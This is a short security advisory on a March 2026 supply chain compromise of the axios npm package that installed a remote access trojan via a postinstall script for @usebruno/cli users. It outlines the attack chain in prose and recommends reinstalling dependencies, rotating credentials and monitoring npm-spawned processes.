Compromised Axios Library Leads to RAT Deployment via @usebruno/cli

On March 31, 2026, a supply chain attack targeted the axios npm package, a widely used HTTP client library for JavaScript. Compromised versions 1.14.1 and 0.30.4 of the library were injected with malicious code that installed a cross-platform Remote Access Trojan (RAT) on systems that installed the affected versions of @usebruno/cli. This attack specifically impacted users of the @usebruno/cli who performed an npm install within a roughly 3-hour window, between 00:21 UTC and 03:30 UTC. The malicious code was designed to execute during the postinstall phase of the package installation, indicating a targeted effort to compromise developer environments. This incident highlights the increasing risk of supply chain attacks targeting open-source software and the importance of verifying the integrity of third-party dependencies.

Attack Chain

1. Attacker compromises the axios npm package, injecting malicious code into versions 1.14.1 and 0.30.4.
2. The compromised axios package is published to the npm registry.
3. A user of @usebruno/cli executes npm install within the attack window (00:21 UTC - 03:30 UTC on March 31, 2026).
4. The npm package manager resolves the dependency chain and downloads the compromised axios package as a dependency of @usebruno/cli.
5. The malicious code within the axios package executes during the postinstall script phase of the installation process.
6. The postinstall script downloads and installs a cross-platform Remote Access Trojan (RAT) on the user’s system.
7. The RAT establishes a connection to a remote command-and-control (C2) server.
8. The attacker uses the RAT to exfiltrate credentials and other sensitive data from the compromised system.

Impact

This supply chain attack could have resulted in widespread compromise of developer systems that used the @usebruno/cli. While the number of affected users is unknown, the incident could have led to the exfiltration of sensitive credentials and proprietary source code, potentially enabling further attacks against the affected organizations and their customers. The incident underscores the need for robust security measures in software development pipelines and continuous monitoring of third-party dependencies for malicious activity.

Recommendation

• If @usebruno/cli was installed during the affected window, reinstall dependencies to ensure a clean version of axios is used (reference: Impact section).
• Rotate all credentials and secrets that were present on systems where @usebruno/cli was installed during the affected window (reference: Impact section).
• Review and implement the security guidance provided in the Aikido Security blog post to further harden your systems (reference: https://www.aikido.dev/blog/axios-npm-compromised-maintainer-hijacked-rat).
• Monitor process creation events for unusual processes spawned by npm or node processes, using the provided Sigma rule (reference: Sigma rule - “Detect Suspicious Process Spawned by NPM”).